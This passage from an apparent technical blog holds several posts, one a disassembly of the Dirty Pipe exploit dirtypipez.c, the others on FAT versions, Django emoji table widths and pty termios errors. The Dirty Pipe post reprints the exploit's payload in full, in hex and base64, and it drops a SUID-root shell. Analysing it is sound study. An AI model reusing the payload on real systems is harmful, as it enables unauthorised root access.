You would think that somewhere in the FAT headers there would be a version field. There isn't one.

According to Microsoft's EFI FAT32 specification, any FAT file system with less than 4085 clusters is FAT12. If it has less than 65,525 clusters, it's FAT16. Otherwise it is FAT32.

Why am I telling you all this? That's for tomorrow's post.

2022-03-08 - reading matryoshka elf / dirtypipez

While looking at the clever dirtypipez.c exploit, I became curious how this elfcode was constructed.

On March 7 2022, Max Kellermann disclosed The Dirty Pipe Vulnerability, a vulnerability he had found in Linux kernel 5.8 and above. Peter (blasty) at haxx.in quickly created a SUID binary exploit for it, called dirtypipez.c. This code contains a tiny ELF binary which writes another binary to /tmp/sh: the ELF Matryoshka doll.

I was wondering how one parses this code — to ensure it does what it says it does, and just because.

The code looks like this:

unsigned char elfcode[] = {
  /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
...

With a leading explanation:

// small (linux x86_64) ELF file matroshka doll that does;
//   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
//   write(fd, elfcode, elfcode_len)
//   chmod("/tmp/sh", 04755)
//   close(fd);
//   exit(0);
//
// the dropped ELF simply does:
//   setuid(0);
//   setgid(0);
//   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);

Base64 encoded, the entire elfcode is:

f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAlwEAAAAAAACXAQAAAAAAAAAQ
AAAAAAAASI09VgAAAEjHxkECAABIx8ACAAAADwVIicdIjTVEAAAASMfCugAAAEjHwAEAAAAPBUjH
wAMAAAAPBUiNPRwAAABIx8btCQAASMfAWgAAAA8FSDH/SMfAPAAAAA8FL3RtcC9zaAB/RUxGAgEB
AAAAAAAAAAAAAgA+AAEAAAB4AEAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAA4AAEAAAAAAAAA
AQAAAAUAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAC6AAAAAAAAALoAAAAAAAAAABAAAAAAAABI
Mf9Ix8BpAAAADwVIMf9Ix8BqAAAADwVIjT0bAAAAagBIieJXSInmSMfAOwAAAA8FSMfAPAAAAA8F
L2Jpbi9zaAA=

Let's place that in decoded form in dirtypipez-matryoshka.elf (e.g. by piping it through base64 -d).

Now, how do we read this blob?

$ readelf -h dirtypipez-matryoshka.elf
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
...
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
...
$ readelf -l dirtypipez-matryoshka.elf

Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x0000000000000197 0x0000000000000197  R E    0x1000

So, the entrypoint is at 0x400078 - 0x400000 = 0x78, which coincides with 64 (elf header) + 56 (program header) = 0x78. Time to disassemble using objdump(1):

$ objdump -D -m i386:x86-64 -b binary \
    --start-address=0x78 dirtypipez-matryoshka.elf
...
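
As a cross-check, the entrypoint arithmetic can be scripted too. A quick sketch using struct, with the field offsets taken from the ELF64 spec (e_entry at 0x18, e_phoff at 0x20, p_vaddr at 0x10 within the program header):

import struct

with open('dirtypipez-matryoshka.elf', 'rb') as fp:
    blob = fp.read()

e_entry, e_phoff = struct.unpack_from('<QQ', blob, 0x18)
p_vaddr, = struct.unpack_from('<Q', blob, e_phoff + 0x10)
print(hex(e_entry - p_vaddr))  # 0x78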

We'll need a few prerequisites to be able to annotate that output.

$ grep -E '#define (O_WRONLY|O_CREAT|O_TRUNC)' \
    /usr/include/asm-generic/fcntl.h
#define O_WRONLY  00000001
#define O_CREAT   00000100  /* not fcntl */
#define O_TRUNC   00001000  /* not fcntl */
$ grep -E '^#define __NR_.* (1|2|3|59|60|90|105|106)$' \
    /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_execve 59
#define __NR_exit 60
#define __NR_chmod 90
#define __NR_setuid 105
#define __NR_setgid 106

Remembering the calling conventions, we know:

  • the first 6 arguments to functions are stored in %rdi, %rsi, %rdx, %rcx, %r8, %r9;
  • the return value is stored in %rax (and for large values also %rdx);
  • the syscall number is stored in %rax.

After adding some annotations, the objdump output looks like this:

0000000000000078 <.data+0x78>:
  78: 48 8d 3d 56 00 00 00  lea    0x56(%rip),%rdi  # "/tmp/sh" at 0x7f+0x56=0xd5
  7f: 48 c7 c6 41 02 00 00  mov    $0x241,%rsi      # O_WRONLY(0x1) | O_CREAT(0x40) | O_TRUNC(0x200)
  86: 48 c7 c0 02 00 00 00  mov    $0x2,%rax        # __NR_open
  8d: 0f 05                 syscall                 # // open("/tmp/sh", 0x241)
  8f: 48 89 c7              mov    %rax,%rdi        # use return value (fd) as argument 1
  92: 48 8d 35 44 00 00 00  lea    0x44(%rip),%rsi  # "\x7fELF..." at 0x99+0x44=0xdd
  99: 48 c7 c2 ba 00 00 00  mov    $0xba,%rdx       # inner_elfcode_len (0xba)
  a0: 48 c7 c0 01 00 00 00  mov    $0x1,%rax        # __NR_write
  a7: 0f 05                 syscall                 # // write(fd, inner_elfcode, inner_elfcode_len)
  a9: 48 c7 c0 03 00 00 00  mov    $0x3,%rax        # __NR_close
  b0: 0f 05                 syscall                 # // close(fd)  // arg1 was reused
  b2: 48 8d 3d 1c 00 00 00  lea    0x1c(%rip),%rdi  # "/tmp/sh" at 0xb9+0x1c=0xd5
  b9: 48 c7 c6 ed 09 00 00  mov    $0x9ed,%rsi      # 0o4755
  c0: 48 c7 c0 5a 00 00 00  mov    $0x5a,%rax       # __NR_chmod
  c7: 0f 05                 syscall                 # // chmod("/tmp/sh", 04755)
  c9: 48 31 ff              xor    %rdi,%rdi        # 0
  cc: 48 c7 c0 3c 00 00 00  mov    $0x3c,%rax       # __NR_exit
  d3: 0f 05                 syscall                 # // exit(0)
  d5: 2f 74 6d 70 2f 73 68 00                       # "/tmp/sh\0"

We can examine the inner (Matryoshka) ELF as well, which is at 0xdd:

$ dd bs=1 if=dirtypipez-matryoshka.elf \
    skip=$((0xdd)) of=dirtypipez-inner.elf

readelf(1) shows that the inner ELF also starts at 0x78. We can read it from the outer elfcode directly:

$ objdump -D -m i386:x86-64 -b binary \
    --start-address=$((0xdd + 0x78)) \
    dirtypipez-matryoshka.elf
...

The only data there starts at 0x18f:

$ dd bs=1 if=dirtypipez-matryoshka.elf \
    skip=$((0x18f)) 2>/dev/null | hd
00000000  2f 62 69 6e 2f 73 68 00   |/bin/sh.|

I'll leave parsing of the assembly to the interested reader. But it checks out.

Likely, one could make the ELF even smaller by abusing the headers, but that wasn't the exercise. Although it could be a fun one.

2022-02-28 - rst tables with htmldjango / emoji two columns wide

For a project, we're using Django to generate a textual report. For readability, it is in monospace text. And we've done it in reStructuredText (RST) so we can generate an HTML document from it as well.

A table in RST might look like this:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |     4 |
+-----------+-------+

Transforming this to HTML with rst2html(1) generates a table similar to this:

<table class="docutils" border="1">
  <colgroup><col width="61%"><col width="39%"></colgroup>
  <thead valign="bottom">
    <tr><th class="head">car brand</th><th class="head">users</th></tr>
  </thead>
  <tbody valign="top">
    <tr><td>Peugeot</td><td>2</td></tr>
    <tr><td>Saab</td><td>1</td></tr>
    <tr><td>Volvo</td><td>4</td></tr>
  </tbody>
</table>

We can generate such a simple RST table using the Django template engine. Let the following Python list be the input:

cars = [('Peugeot', 2), ('Saab', 1), ('Volvo', 4)]

And as Django template, we'll use this:

+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|rjust:5 }} |
+-----------+-------+
{% endfor %}

Sidenote: when generating text instead of HTML, we'd normally start the Django template with {% autoescape off %}. Elided here for clarity.

Working example

Here's a working Python 3 snippet, including a settings.configure() hack so we can skip the usual Django project setup that would just clutter this example:

# Quick and dirty Django setup; tested with Django 2.1
import django.conf
django.conf.settings.configure(
    DEBUG=True, TEMPLATES=[{
        'BACKEND': 'django.template.backends.django.DjangoTemplates'}])
django.setup()

# Setting up the content
cars = [('Peugeot', 2), ('Saab', 1), ('Volvo', 4)]

TEMPLATE = '''\
+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|rjust:5 }} |
+-----------+-------+
{% endfor %}'''

# Rendering the table
from django.template import Context, Template
tpl = Template(TEMPLATE)
context = Context({'cars': cars})
print(tpl.render(context), end='')

But now, let's say we wanted to add some emoji. Like a 🏆 :trophy: next to the highest number. Because, in a big list, having some color can be tremendously useful to direct attention to where it's due.

We'll replace the numbers with strings, optionally including an emoji:

cars = [('Peugeot', '2'), ('Saab', '1'), ('Volvo', '\U0001F3C6 4')]

Rerun, and we get this:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |   🏆 4 |
+-----------+-------+

Interesting... that one trophy character is taking up room for two.

You might be thinking that is just the display. But rst2html(1) agrees that this is wrong:

$ python3 cars.py | rst2html - cars.html
cars.rst:1: (ERROR/3) Malformed table.

So, what is the cause of this?

Emoji have East Asian width

On the Unicode section of the halfwidth and fullwidth forms page on Wikipedia we can read the following:

Unicode assigns every code point an "East Asian width" property.

[... W for naturally wide characters e.g. Japanese Hiragana ...
... Na for naturally narrow characters, e.g. ISO Basic Latin ...]

Terminal emulators can use this property to decide whether a character should consume one or two "columns" when figuring out tabs and cursor position.

And in the Unicode 12 standard, Annex #11, it reads:

In modern practice, most alphabetic characters are rendered by variable-width fonts using narrow characters, even if their encoding in common legacy sets uses multiple bytes. In contrast, emoji characters were first developed through the use of extensions of legacy East Asian encodings, such as Shift-JIS, and in such a context they were treated as wide characters. While these extensions have been added to Unicode or mapped to standardized variation sequences, their treatment as wide characters has been retained, and extended for consistency with emoji characters that lack a legacy encoding.

In short:

  • characters can be narrow or wide (with some exceptions);
  • emoji evolved from East Asian encodings;
  • emoji are wide, in contrast to "normal" European characters (verified below).
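
We can verify those width classes with the unicodedata module from the Python Standard Library:

from unicodedata import east_asian_width

print(east_asian_width('\U0001F3C6'))  # 'W'  (wide trophy)
print(east_asian_width('4'))           # 'Na' (narrow digit)
print(east_asian_width(' '))           # 'Na' (narrow space)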

Solving the justification

With that knowledge, we now know why the table is wrongly dimensioned around the emoji. The rjust filter counts three characters and adds two spaces. But it should count four columns (one wide emoji, a narrow space and a narrow digit) and add only one space.

Luckily the Python Standard Library has the necessary prerequisites. We add this function:

from unicodedata import east_asian_width

def column_width(s):
    """Return total column width of the string s, taking into account
    that some unicode characters take up two columns."""
    return sum(column_width.widths[east_asian_width(ch)] for ch in s)
column_width.widths = {'Na': 1, 'H': 1, 'F': 2, 'W': 2, 'N': 2, 'A': 1}

While len('\U0001F3C6 4') returns 3, column_width('\U0001F3C6 4') returns 4.

All we have to do is create a new filter and apply it:

# By re-using the register from defaultfilters, we're adding it into
# the builtin defaults.
from django.template.defaultfilters import register, stringfilter

@register.filter(is_safe=True)
@stringfilter
def unicode_rjust(value, arg):
    return value.rjust(int(arg) - (column_width(value) - len(value)))

Use the new unicode_rjust filter:

TEMPLATE = '''\
+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|unicode_rjust:5 }} |
+-----------+-------+
{% endfor %}'''

Result:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |  🏆 4 |
+-----------+-------+

It looks good and rst2html is now also happy to convert.
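
If the left-hand column can contain emoji too, the same trick applies to ljust. A hypothetical unicode_ljust would look like this:

@register.filter(is_safe=True)
@stringfilter
def unicode_ljust(value, arg):
    return value.ljust(int(arg) - (column_width(value) - len(value)))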

[table using rjust versus unicode_rjust]

2022-01-22 - curious termios error / switching to asyncio serial

My Python code that interfaces with a serial port stopped working when I refactored it to use asyncio. It started raising Invalid argument exceptions from tcsetattr(3). Why would asynchronous Python misbehave? Was there a bug in serial_asyncio?

TL;DR: When interfacing with an openpty(3) pseudoterminal — which I used to emulate a real serial port — setting parity and bytesize is not supported. But an error would only show up when tcsetattr(3) was called twice, which happened only in the asyncio case.

I was working on some Python code to communicate with an IEC62056-21 device over a serial bus. I planned on using the UART of a Raspberry Pi for this purpose.

The basics involve opening a serial.Serial('/dev/ttyACM0', baudrate) Python serial object, reading from it and writing to it. But, for serial communication, there is more than just the baud rate which needs to be agreed upon. For this IEC62056-21 device, it is:

  • baud rate 300 (initially),
  • 1 start bit (common default),
  • 7 bits per byte (only 7 bits ASCII is spoken),
  • 1 even parity bit (making sure all eight bits XOR to zero),
  • 1 stop bit (common default).

The Python serial object supports all that:

ser = serial.Serial(
    '/dev/ttyACM0', baudrate=300,
    parity=serial.PARITY_EVEN,
    bytesize=7)

That should work, and it does. But...

Testing serial code using an openpty pair

Developing against the real device is awkward and fragile. So, instead of developing against the hardware device directly, I decided it was worth the effort to emulate the IEC62056-21 device, a fake server if you will.

For this purpose, I needed a bridge between two serial devices. This can be done using socat:

$ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
2022/01/22 12:59:34 socat[700243] N PTY is /dev/pts/28
2022/01/22 12:59:34 socat[700243] N PTY is /dev/pts/29
2022/01/22 12:59:34 socat[700243] N starting data transfer loop with FDs [5,5] and [7,7]

socat spawns a bridge between two openpty(3) created pseudoterminals and creates two symlinks for easy access:

$ readlink client.dev server.dev
/dev/pts/29
/dev/pts/28

We can now connect our fake server to one end, and the client we're developing to the other.

(In my case, I'm using a custom serialproxy.py that does what socat does, and more, because it also simulates baud rate slowness and checks speed compatibility, relevant because the IEC62056-21 protocol uses negotiable/changing transfer rates.)

A simple test script connecting to both the server and client end might look as follows:

# For this example, run the following in
# another terminal (in the same directory):
# $ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
# WARNING: Restart this socat to reset bridge state.

import serial
import time

SERIAL_OPTIONS = {
    'baudrate': 300,
    'parity': serial.PARITY_EVEN,
    'bytesize': 7,
    'stopbits': 1,
}

def main_serial(write_dev, read_dev):
    reader = serial.Serial(
        read_dev, **SERIAL_OPTIONS)
    #reader.timeout = 0
    writer = serial.Serial(
        write_dev, **SERIAL_OPTIONS)

    messages = [
        b'foo\n', b'bar\n', b'baz\n']
    for msg in messages:
        writer.write(msg)
        print('send', msg)
        out = reader.read(4)
        print('recv', out)
        assert msg == out, (msg, out)
        time.sleep(1)

main_serial('server.dev', 'client.dev')

This example prints:

send b'foo\n'
recv b'foo\n'
send b'bar\n'
recv b'bar\n'
send b'baz\n'
recv b'baz\n'

That's nice. We can use serial.Serial() without requiring a hardware UART during development.

(However, if you run the same script again without restarting socat, you'll be greeted with an Invalid argument exception. We'll see why in a bit. Restarting socat resets the bridge state and makes the script work again.)

Testing asyncio serial code using an openpty pair

Because it is 2022, and I don't want to use threads in Python (they're a poor combo), and I want to be able to run multiple subsystems at once, I decided to convert this script to use Python Asynchronous I/O.

Surely converting this script to asyncio is easy:

# For this example, run the following in
# another terminal (in the same directory):
# $ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
# WARNING: Restart this socat to reset bridge state.

import asyncio
import serial
from serial_asyncio import open_serial_connection

SERIAL_OPTIONS = {
    'baudrate': 300,
    'parity': serial.PARITY_EVEN,
    'bytesize': 7,
    'stopbits': 1,
}

def main_aioserial(write_dev, read_dev):
    loop = asyncio.get_event_loop()
    main_coro = aioserial(write_dev, read_dev)
    loop.run_until_complete(main_coro)
    loop.close()

async def aioserial(write_dev, read_dev):
    async def send(ser, msgs):
        for msg in msgs:
            ser.write(msg)
            print('send (asyncio)', msg)
            await asyncio.sleep(1)

    async def recv(ser):
        for i in range(3):
            out = await ser.readuntil(b'\n')
            print('recv (asyncio)', out)

    reader, _ = await open_serial_connection(
        url=read_dev, **SERIAL_OPTIONS)
    _, writer = await open_serial_connection(
        url=write_dev, **SERIAL_OPTIONS)

    messages = [b'foo\n', b'bar\n', b'baz\n']
    send_coro = send(writer, messages)
    recv_coro = recv(reader)
    await asyncio.wait({
        asyncio.create_task(coro)
        for coro in (send_coro, recv_coro)})

main_aioserial('server.dev', 'client.dev')

This should print the following:

send (asyncio) b'foo\n'
recv (asyncio) b'foo\n'
send (asyncio) b'bar\n'
recv (asyncio) b'bar\n'
send (asyncio) b'baz\n'
recv (asyncio) b'baz\n'

But instead, it prints:

Traceback (most recent call last):
  File "test_aioserial.py", line 45, in <module>
    main_aioserial('server.dev', 'client.dev')
  File "test_aioserial.py", line 20, in main_aioserial
    loop.run_until_complete(coro)
  File "asyncio/base_events.py", line 616, in run_until_complete
    return future.result()
  File "test_aioserial.py", line 35, in aioserial
    reader, _ = await open_serial_connection(
  File "serial_asyncio/__init__.py", line 438, in open_serial_connection
    transport, _ = yield from create_serial_connection(
  File "asyncio/coroutines.py", line 124, in coro
    res = func(*args, **kw)
  File "serial_asyncio/__init__.py", line 412, in create_serial_connection
    transport = SerialTransport(loop, protocol, ser)
  File "serial_asyncio/__init__.py", line 63, in __init__
    self._serial.timeout = 0
  File "serial/serialutil.py", line 368, in timeout
    self._reconfigure_port()
  File "serial/serialposix.py", line 435, in _reconfigure_port
    termios.tcsetattr(
termios.error: (22, 'Invalid argument')

This had me stumped for quite some time. Why would serial_asyncio misbehave?

Debugging Python tcsetattr

I decided to add some tracing code in /usr/lib/python3/dist-packages/serial/serialposix.py:

...
        # activate settings
        if force_update or [iflag, oflag, cflag, lflag, ispeed, ospeed, cc] != orig_attr:
            # vvv-- one line of code added --vvv
            import os; os.write(2, b'DEBUG serialposix.py tcsetattr() 0o%o\n' % (cflag,))
            termios.tcsetattr(
                self.fd,
                termios.TCSANOW,
                [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
...

Running the synchronous code snippet now showed:

$ python3 test_serial.py
DEBUG serialposix.py tcsetattr() 0o4657
DEBUG serialposix.py tcsetattr() 0o4657
send b'foo\n'
...

That is, two calls because of the two Serial objects being set up.

The output of the asynchronous version was now:

$ python3 test_aioserial.py
DEBUG serialposix.py tcsetattr() 0o4657
DEBUG serialposix.py tcsetattr() 0o4647
Traceback (most recent call last):
...
termios.error: (22, 'Invalid argument')

Here, the second call to tcsetattr(3) is done when setting the timeout to 0 (to make it "non-blocking"). It's still setting up the first of the two Serial objects.

If we go back to the first example, we can uncomment the reader.timeout = 0 line and observe how the synchronous version now also chokes immediately.

So, it's not a serial_asyncio problem. But it is still a problem.

An strace then? Calling strace will show us which system calls are being executed. Maybe insight into their failure can shed some light on this. After all, the tcsetattr(3) library call gets translated to one or more system calls:

$ strace -s 2048 python3 test_serial.py 2>&1 |
  grep -A15 'write(.*DEBUG serialposix'

We know the call comes right after our write(2).

write(2, "DEBUG serialposix.py tcsetattr() 0o4657\n", 40DEBUG serialposix.py tcsetattr() 0o4657
) = 40

There it is. And then immediately some ioctl(2) calls.

ioctl(3, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(3, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(3, SNDCTL_TMR_START or TCSETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TIOCMBIS, [TIOCM_DTR])         = -1 ENOTTY (Inappropriate ioctl for device)
ioctl(3, TCFLSH, TCIFLUSH)              = 0

There was one error, but it happened during the first call, so it is ignored. (I can tell you now that those first four ioctl calls are all caused by a single Python termios.tcsetattr() call.)

pipe2([4, 5], O_CLOEXEC)                = 0
pipe2([6, 7], O_CLOEXEC)                = 0
fcntl(4, F_SETFL, O_RDONLY|O_NONBLOCK)  = 0
fcntl(6, F_SETFL, O_RDONLY|O_NONBLOCK)  = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0

Some other code was called, and then, the second call to tcsetattr(3):

write(2, "DEBUG serialposix.py tcsetattr() 0o4647\n", 40DEBUG serialposix.py tcsetattr() 0o4647
) = 40
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, SNDCTL_TMR_START or TCSETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0

And after this point in the trace, Python starts collecting values to show a backtrace.

Now that is unexpected. The last system call returned 0 (SUCCESS), yet Python considered it failed and reported "Invalid argument".

I'm certain Python is not making that up, so there must be some other explanation.

Checking the library sources

The CPython library tcsetattr function looks like:

static PyObject *
termios_tcsetattr_impl(PyObject *module, int fd, int when, PyObject *term)
...
    if (cfsetispeed(&mode, (speed_t) ispeed) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
    if (cfsetospeed(&mode, (speed_t) ospeed) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
    if (tcsetattr(fd, when, &mode) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
...

Pretty straightforward.

The CPython function calls the GNU glibc tcsetattr library function, which looks like:

int
__tcsetattr (int fd, int optional_actions, const struct termios *termios_p)
...
  return INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
}

One syscall. Only one! But why is Python turning this into an exception then?

The answer turned out to be in local-tcsetaddr.diff — a distro-specific patch deployed on Debian/Linux distributions and derivatives (like Ubuntu):

# All lines beginning with `# DP:' are a description of the patch.
# DP: Description: tcsetattr sanity check on PARENB/CREAD/CSIZE for ptys
# DP: Related bugs: 218131.
...
--- a/sysdeps/unix/sysv/linux/tcsetattr.c
+++ b/sysdeps/unix/sysv/linux/tcsetattr.c
@@ -75,7 +80,55 @@
   memcpy (&k_termios.c_cc[0], &termios_p->c_cc[0],
    __KERNEL_NCCS * sizeof (cc_t));

-  return INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
+  retval = INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
+
+  /* The Linux kernel silently ignores the invalid c_cflag on pty.
+     We have to check it here, and return an error.  But if some other
+     setting was successfully changed, POSIX requires us to report
+     success. */
...
+   /* It looks like the Linux kernel silently changed the
+      PARENB/CREAD/CSIZE bits in c_cflag. Report it as an
+      error. */
+   __set_errno (EINVAL);
+   retval = -1;
+ }
+    }
+   return retval;
 }

According to that patch, the related Debian bug report 218131, and other communication, setting invalid/unsupported c_cflag bits on a pseudoterminal (pty) should return EINVAL. Linux apparently just ignores the bad c_cflag bits.

POSIX tcsetattr needs to handle three conditions correctly:

  • If all changes are successful, return success (0).
  • If some changes are successful and some aren't, return success.
  • If no changes are successful, return error (-1, errno=EINVAL).

The problem occurs when setting certain flags (PARENB, CREAD, or one of the CSIZE parameters) on a pty. The kernel silently ignores those settings, so libc is responsible for doing the right thing.

And indeed, if we remove the PARENB (enable even parity) and CS7 (7 bit CSIZE) settings, the Invalid argument error goes away:

SERIAL_OPTIONS = {
    'baudrate': 300,
    #DISABLED# 'parity': serial.PARITY_EVEN,
    #DISABLED# 'bytesize': 7,
    'stopbits': 1,
}
$ python3 test_serial.py
DEBUG serialposix.py tcsetattr() 0o4267
DEBUG serialposix.py tcsetattr() 0o4277
send b'foo\n'
...

And now we can run the script consecutive times without restarting socat.

Setting parity or bytesize on a pseudoterminal is a big no

Apparently, pseudoterminals, as opened by openpty(3), do not grok setting different parity or bytesize. This was silently ignored by the tcsetattr(3) library call, as long as something else was altered at the same time.

Setting the baud rate works fine; it is propagated across to the slave pty. But while testing, we'll need to avoid setting unsupported parity or bytesize.
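
Here's a minimal sketch that reproduces the behaviour without pyserial or socat, assuming a Debian-patched glibc:

import pty
import termios

master, slave = pty.openpty()

# Changing only the baud rate on a pty works fine:
attrs = termios.tcgetattr(slave)
attrs[4] = attrs[5] = termios.B300  # ispeed, ospeed
termios.tcsetattr(slave, termios.TCSANOW, attrs)

# Requesting only PARENB/CS7 is silently ignored by the kernel; the
# patched glibc sees that nothing changed and returns EINVAL:
attrs = termios.tcgetattr(slave)
attrs[2] = (attrs[2] & ~termios.CSIZE) | termios.CS7 | termios.PARENB
termios.tcsetattr(slave, termios.TCSANOW, attrs)
# -> termios.error: (22, 'Invalid argument')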

After figuring all that out, going back to the manpage of tcsetattr(3) revealed this:

RETURN VALUE
  Note that tcsetattr() returns success
  if any of the requested changes could
  be successfully carried out. Therefore,
  when making multiple changes it may be
  necessary to follow this call with a
  further call to tcgetattr() to check
  that all changes have been performed
  successfully.

So, Python might be setting multiple values at once. And, maybe, just maybe, Python should then always follow tcsetattr(3) with a verifying tcgetattr(3), like the manpage suggests. That would cause consistent behaviour. And it would've saved me hours of debugging, as I would've identified the custom SERIAL_OPTIONS as the culprit so much sooner.
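
Something like this hypothetical wrapper would have surfaced the problem immediately (a sketch; whether such a check belongs in CPython or in pyserial is up for debate):

import termios

def tcsetattr_verified(fd, when, wanted):
    """tcsetattr(3), followed by the tcgetattr(3) check the manpage suggests."""
    termios.tcsetattr(fd, when, wanted)
    if termios.tcgetattr(fd) != wanted:
        raise termios.error(22, 'Invalid argument (not all changes applied)')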